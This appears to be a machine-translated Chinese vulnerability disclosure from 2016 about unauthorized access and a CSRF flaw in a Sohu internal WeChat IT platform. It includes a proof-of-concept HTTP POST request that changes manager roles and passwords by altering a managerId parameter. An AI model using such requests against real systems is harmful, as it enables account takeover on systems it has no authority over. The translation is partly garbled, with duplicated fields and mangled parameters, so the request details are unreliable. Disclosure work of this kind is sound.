搜狐某内部系统未授权访问(可执行任意操作)

漏洞标题 搜狐某内部系统未授权访问(可执行任意操作) 相关厂商 搜狐 漏洞作者 Aasron 提交时间 2016-05-01 08:35 公开时间 2016-06-15 09:40 漏洞类型 未授权访…

漏洞标题 搜狐的内部系统无权访问(可以执行任意操作) 相关制造商 搜狐 漏洞作者 Aasron 提交时间 2016-05-01 08: 35 公共时间 2016-06-15 09: 40 漏洞类型 未经授权的访问/许可绕过 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 越权存取 漏洞详细信息 搜狐内部IT微信平台 http://wx.sohu-inc.com 您只修复了命令执行漏洞,但未修复未经授权的访问问题。 页 /index.jsp 是的 http://wx.sohu-inc.com/index.jsp 漏洞证明: 使用这些来制作字典并运行登录帐户。 在页面注销后,前台中没有验证机制。 背景本地帐户或域帐户密码可以被捕获和读取。

还有一个CSRF问题 POST/rAction!updateRole HTTP/1.1 主机: wx.sohu-inc.com 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64; rv: 45.0)Gecko/20100101 Firefox/45.0 接受: text/html,application/xhtml + xml,application/xml; q=0.9,*/*; q=0.8 Accept-Language: zh-CN,zh; q=0.8,en-US; q=0.5,en; Q=0.3 Accept-Encoding: gzip,deflate Referer:http://wx.sohu-inc.com/rAction!findRoles Cookie: JSESSIONID=ABE2A34A2C8134233580BB74BE24D112 连接:关闭 内容类型: application/x-www-form-urlencoded 内容长度: 91 r.managerId=2及r.typeId=1&安培; r.managerEmail=管理员&安培; r.managerPwd=XXXX 要更改密码或执行其他操作(如删除),只需更改r.managerId参数即可。

这里有一些关于VPN问题的内容。

修理计划: ASD 版权声明:请注明出处Aasron @乌云